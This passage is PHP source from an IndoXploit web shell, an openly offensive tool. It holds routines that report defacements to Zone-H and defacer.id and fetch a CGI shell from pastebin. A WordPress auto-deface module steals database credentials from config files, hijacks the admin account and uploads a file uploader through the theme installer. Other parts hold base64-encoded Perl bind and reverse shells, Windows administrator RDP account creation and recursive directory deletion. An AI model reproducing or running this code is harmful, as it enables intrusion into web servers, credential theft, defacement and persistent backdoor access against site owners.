curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
return curl_exec($ch);
curl_close($ch);
}
foreach($domain as $url) {
$zoneh = zoneh($url,$nick);
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
echo "$url -> <font color=lime>OK</font><br>";
} else {
echo "$url -> <font color=red>ERROR</font><br>";
}
}
} else {
echo "<center><form method='post'>
<u>Defacer</u>: <br>
<input type='text' name='nick' size='50' value='IndoXploit'><br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
<input type='submit' name='submit' value='Submit' style='width: 450px;'>
</form>";
}
echo "</center>";
} elseif($_GET['do'] == 'defid') {
echo "<form method='POST' action='' align='center'>
Attacker : <br><input type='text' name='nick' placeholder='Xmall75' style='height: 33px; width: 250px'><br>
Team : <br><input type='text' name='team' placeholder='Security Cyber Art' style='height: 33px; width: 250px'><br>
Sites : <br><textarea class='form-control' name='sites' placeholder='http://site.com/' style='height: 150px; width: 250px'></textarea><br>
<input type='submit' name='sikat' value='Submit!!'>
</form>
</html>";
ini_set('display_errors', 0);
error_reporting(0);
$nick = $_POST['nick'];
$team = $_POST['team'];
$sikat = $_POST['sikat'];
$url = explode("
", $_POST['sites']);
if($sikat){
echo "Notify with nick [ ".$nick." ] and With Team [ ".$team." ] <br>";
function defid($url,$nick,$team) {
$ch = curl_init("https://defacer.id/archives/notify");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
return curl_exec($ch);
curl_close($ch);
}
foreach($url as $url) {
$defid = defid($url,$nick,$team);
if(preg_match('#<div class="success-box">#', $defid)) {
echo "OK -> ".$url."<br>";
} else {
echo "Error -> ".$url."<br>";
}
}
}
} elseif($_GET['do'] == 'reverseip') {
function s57_curl($domen){
$c = curl_init();
$curl = array(
CURLOPT_URL=>"http://viewdns.info/reverseip/?host=".$domen."&t=1",
CURLOPT_USERAGENT=>"User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
CURLOPT_RETURNTRANSFER=>1,
CURLOPT_SSL_VERIFYPEER=>0,
CURLOPT_HEADER=>0,
CURLOPT_FOLLOWLOCATION=>1);
curl_setopt_array($c,$curl);
$e = curl_exec($c);
curl_close($c);
return $e;
}
function s57_p($pemisah,$string){
return explode(chr(1),str_replace($pemisah,chr(1),$string));
}
echo "<form method='post'>
<center><input class='text' type='text' name='domain' placeholder='IP/Domain' style='width: 250px; height: 33px;'><input class='submit' type='submit' name='sbmt' style='color: lime; width: 30px; height: 33px;' value='>>'>
<br><span style='font-size: 17px;'> Masukin site tanpa http atau https </span></form>";
if(isset($_POST['sbmt'])){
echo "Result for : " .$_POST['domain'];
$r = s57_p(array('<table border="1">','<table width="1000" border="0">'),s57_curl($_POST['domain']));
echo "<table border=1>";
echo $r[1];
echo "</table></center>";
}
} elseif($_GET['do'] == 'cgi') {
$cgi_dir = mkdir('idx_cgi', 0755);
$file_cgi = "idx_cgi/cgi.izo";
$isi_htcgi = "AddHandler cgi-script .izo";
$htcgi = fopen(".htaccess", "w");
fwrite($htcgi, $isi_htcgi);
fclose($htcgi);
$cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
$cgi = fopen($file_cgi, "w");
fwrite($cgi, $cgi_script);
fclose($cgi);
chmod($file_cgi, 0755);
echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
} elseif($_GET['do'] == 'fake_root') {
ob_start();
$cwd = getcwd();
$ambil_user = explode("/", $cwd);
$user = $ambil_user[2];
if($_POST['reverse']) {
$site = explode("
", $_POST['url']);
$file = $_POST['file'];
foreach($site as $url) {
$cek = getsource("$url/~$user/$file");
if(preg_match("/hacked/i", $cek)) {
echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
}
}
} else {
echo "<center><form method='post'>
Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
Domain: <br>
<textarea style='width: 450px; height: 250px;' name='url'>";
reverse($_SERVER['HTTP_HOST']);
echo "</textarea><br>
<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
</form><br>
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
}
} elseif($_GET['do'] == 'hasher') {
$submit = $_POST['go'];
if (isset($submit)) {
$pass = $_POST['password']; // password
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
$hash = md5($pass); // md5 hash
$md2 = hash('md2',$_POST['password']); // md2 hash
$md4 = hash("md4", $pass); // md4
$hash_md5 = md5($salt . $pass); // md5 hash with salt
$hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1
$hash1 = sha1($pass); // sha1 hash
$sha256 = hash("sha256", $text); // sha256
$sha384 = hash('sha384',$_POST['password']); // sha384
$sha512 = hash('sha512',$_POST['password']); // sha512
$hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt
$hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5
}
echo '<form action="" method="post"><b> ';
echo " <font color='lime'> Kata : ";
echo "<br>";
echo ' <input type="text" name="password" size="50" />';
echo '<input type="submit" name="go" value=">>" />';
echo ' <br>';
echo ' <h2>Hasil Hash</h2></th></center></tr>';
echo '<br>';
echo ' Original Password <br> <input class=inputz type=text size=50 value=' . $pass . '> <br><br>';
echo ' MD5 <br> <input class=inputz type=text size=50 value=' . $hash . '> <br><br>';
echo ' MD2 <br> <input class=inputz type=text size=50 value=' . $md2 . '> <br><br>';
echo ' MD4 <br> <input class=inputz type=text size=50 value=' . $md4 . '> <br><br>';
echo ' MD5 with Salt <br> <input class=inputz type=text size=50 value=' . $hash_md5 . '> <br><br>';
echo ' MD5 with Salt & Sha1 <br> <input class=inputz type=text size=50 value=' . $hash_md5_double . '> <br><br>';
echo ' Sha1 <br> <input class=inputz type=text size=50 value=' . $hash1 . '> <br><br>';
echo ' Sha256 <br> <input class=inputz type=text size=50 value=' . $sha256 . '> <br><br>';
echo ' Sha384 <br> <input class=inputz type=text size=50 value=' . $sha384 . '> <br><br>';
echo ' Sha512 <br> <input class=inputz type=text size=50 value=' . $sha512 . '> <br><br>';
echo ' Sha1 with Salt <br> <input class=inputz type=text size=50 value=' . $hash1_sha1 . '> <br><br>';
echo ' Sha1 with Salt & MD5 <br> <input class=inputz type=text size=50 value=' . $hash1_sha1_double . '> </font><br><br>';
} elseif($_GET['do'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
echo "<center><font color=red>gagal buat file adminer</font></center>";
}
}
} elseif($_GET['do'] == 'auto_dwp') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"redirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$scan = $_POST['link_config'];
$link_config = scandir($scan);
$script = htmlspecialchars($_POST['script']);
$user = "indoxploit";
$pass = "indoxploit";
$passx = md5($pass);
foreach($link_config as $dir_config) {
if(!is_file("$scan/$dir_config")) continue;
$config = file_get_contents("$scan/$dir_config");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='lime'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='red'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=lime>$user</font><br>";
echo "[+] password: <font color=lime>$pass</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center><h1>WordPress Auto Deface</h1>
<form method='post'>
<input type='text' name='link_config' size='50' height='10' value='$dir'><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form>
<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
</center>";
}
} elseif($_GET['do'] == 'auto_dwp2') {
if($_POST['auto_deface_wp']) {
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION,true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function lohgin($cek, $web, $userr, $pass, $wp_submit) {
$post = array(
"log" => "$userr",
"pwd" => "$pass",
"rememberme" => "forever",
"wp-submit" => "$wp_submit",
"redirect_to" => "$web",
"testcookie" => "1",
);
$ch = curl_init($cek);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$link = explode("
", $_POST['link']);
$script = htmlspecialchars($_POST['script']);
$user = "indoxploit";
$pass = "indoxploit";
$passx = md5($pass);
foreach($link as $dir_config) {
$config = anucurl($dir_config);
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
} else {
echo "[+] $target <br>";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
if(!$conn OR !$db OR !$update) {
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
mysql_close($conn);
} else {
$site = "$target/wp-login.php";
$site2 = "$target/wp-admin/theme-install.php?upload";
$b1 = anucurl($site2);
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
$b = lohgin($site, $site2, $user, $pass, $wp_sub);
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$upload3);
$post2 = array(
"_wpnonce" => "$anu2",
"_wp_http_referer" => "/wp-admin/theme-install.php?upload",
"themezip" => "@$www",
"install-theme-submit" => "Install Now",
);
$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
$data3 = curl_exec($ch);
curl_close($ch);
$y = date("Y");
$m = date("m");
$namafile = "id.php";
$fpi = fopen($namafile,"w");
fputs($fpi,$script);
$ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
curl_setopt($ch6, CURLOPT_POST, true);
curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
$postResult = curl_exec($ch6);
curl_close($ch6);
$as = "$target/k.php";
$bs = anucurl($as);
if(preg_match("#$script#is", $bs)) {
echo "[+] <font color='lime'>berhasil mepes...</font><br>";
echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
} else {
echo "[-] <font color='red'>gagal mepes...</font><br>";
echo "[!!] coba aja manual: <br>";
echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
echo "[+] username: <font color=lime>$user</font><br>";
echo "[+] password: <font color=lime>$pass</font><br><br>";
}
mysql_close($conn);
}
}
} else {
echo "<center><h1>WordPress Auto Deface V.2</h1>
<form method='post'>
Link Config: <br>
<textarea name='link' placeholder='http://target.com/pastigans_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
<input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
<input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
</form></center>";
}
} elseif($_GET['do'] == 'network') {
echo "<form method='post'>
<u>Bind Port:</u> <br>
PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
<input type='submit' name='sub_bp' value='>>'>
</form>
<form method='post'>
<u>Back Connect:</u> <br>
Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>
PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
<input type='submit' name='sub_bc' value='>>'>
</form>";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
if(isset($_POST['sub_bp'])) {
$f_bp = fopen("/tmp/bp.pl", "w");
fwrite($f_bp, base64_decode($bind_port_p));
fclose($f_bp);
$port = $_POST['port_bind'];
$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre>".$out."
".exe("ps aux | grep bp.pl")."</pre>";
unlink("/tmp/bp.pl");
}
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
if(isset($_POST['sub_bc'])) {
$f_bc = fopen("/tmp/bc.pl", "w");
fwrite($f_bc, base64_decode($bind_connect_p));
fclose($f_bc);
$ipbc = $_POST['ip_bc'];
$port = $_POST['port_bc'];
$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
sleep(1);
echo "<pre>".$out."
".exe("ps aux | grep bc.pl")."</pre>";
unlink("/tmp/bc.pl");
}
} elseif($_GET['do'] == 'krdp_shell') {
if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
if($_POST['create']) {
$user = htmlspecialchars($_POST['user']);
$pass = htmlspecialchars($_POST['pass']);
if(preg_match("/$user/", exe("net user"))) {
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
} else {
$add_user = exe("net user $user $pass /add");
$add_groups1 = exe("net localgroup Administrators $user /add");
$add_groups2 = exe("net localgroup Administrator $user /add");
$add_groups3 = exe("net localgroup Administrateur $user /add");
echo "[ RDP ACCOUNT INFO ]<br>
------------------------------<br>
IP: <font color=lime>".$ip."</font><br>
Username: <font color=lime>$user</font><br>
Password: <font color=lime>$pass</font><br>
------------------------------<br><br>
[ STATUS ]<br>
------------------------------<br>
";
if($add_user) {
echo "[add user] -> <font color='lime'>Berhasil</font><br>";
} else {
echo "[add user] -> <font color='red'>Gagal</font><br>";
}
if($add_groups1) {
echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
} elseif($add_groups2) {
echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
} elseif($add_groups3) {
echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
} else {
echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
}
echo "------------------------------<br>";
}
} elseif($_POST['s_opsi']) {
$user = htmlspecialchars($_POST['r_user']);
if($_POST['opsi'] == '1') {
$cek = exe("net user $user");
echo "Checking username <font color=lime>$user</font> ....... ";
if(preg_match("/$user/", $cek)) {
echo "[ <font color=lime>Sudah ada</font> ]<br>
------------------------------<br><br>
<pre>$cek</pre>";
} else {
echo "[ <font color=red>belum ada</font> ]";
}
} elseif($_POST['opsi'] == '2') {
$cek = exe("net user $user indoxploit");
if(preg_match("/$user/", exe("net user"))) {
echo "[change password: <font color=lime>indoxploit</font>] -> ";
if($cek) {
echo "<font color=lime>Berhasil</font>";
} else {
echo "<font color=red>Gagal</font>";
}
} else {
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
}
} elseif($_POST['opsi'] == '3') {
$cek = exe("net user $user /DELETE");
if(preg_match("/$user/", exe("net user"))) {
echo "[remove user: <font color=lime>$user</font>] -> ";
if($cek) {
echo "<font color=lime>Berhasil</font>";
} else {
echo "<font color=red>Gagal</font>";
}
} else {
echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
}
} else {
//
}
} else {
echo "-- Create RDP --<br>
<form method='post'>
<input type='text' name='user' placeholder='username' value='indoxploit' required>
<input type='text' name='pass' placeholder='password' value='indoxploit' required>
<input type='submit' name='create' value='>>'>
</form>
-- Option --<br>
<form method='post'>
<input type='text' name='r_user' placeholder='username' required>
<select name='opsi'>
<option value='1'>Cek Username</option>
<option value='2'>Ubah Password</option>
<option value='3'>Hapus Username</option>
</select>
<input type='submit' name='s_opsi' value='>>'>
</form>
";
}
} else {
echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
}
} elseif($_GET['do'] == 'contact') {
echo "<center><div style='color: #fff; background: #333; width: 350px; height: 85px; padding-top: 25px; border: 1px #333; border-radius: 3px;'><span'> E-mail : [email protected] <br> FB : facebook.com/bukanyimyam </span></div></center>";
} elseif($_GET['act'] == 'newfile') {
if($_POST['new_save_file']) {
$newfile = htmlspecialchars($_POST['newfile']);
$fopen = fopen($newfile, "a+");
if($fopen) {
$act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
}
echo $act;
echo "<form method='post'>
Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
<input type='submit' name='new_save_file' value='Submit'>
</form>";
} elseif($_GET['act'] == 'newfolder') {
if($_POST['new_save_folder']) {
$new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
if(!mkdir($new_folder)) {
$act = "<font color=red>permission denied</font>";
} else {
$act = "<script>window.location='?dir=".$dir."';</script>";
}
}
echo $act;
echo "<form method='post'>
Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
<input type='submit' name='new_save_folder' value='Submit'>
</form>";
} elseif($_GET['act'] == 'rename_dir') {
if($_POST['dir_rename']) {
$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
if($dir_rename) {
$act = "<script>window.location='?dir=".dirname($dir)."';</script>";
} else {
$act = "<font color=red>permission denied</font>";
}
echo "".$act."<br>";
}
echo "<form method='post'>
<input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
<input type='submit' name='dir_rename' value='rename'>
</form>";
} elseif($_GET['act'] == 'delete_dir') {
if(is_dir($dir)) {
if(is_writable($dir)) {
@rmdir($dir);
@exe("rm -rf $dir");
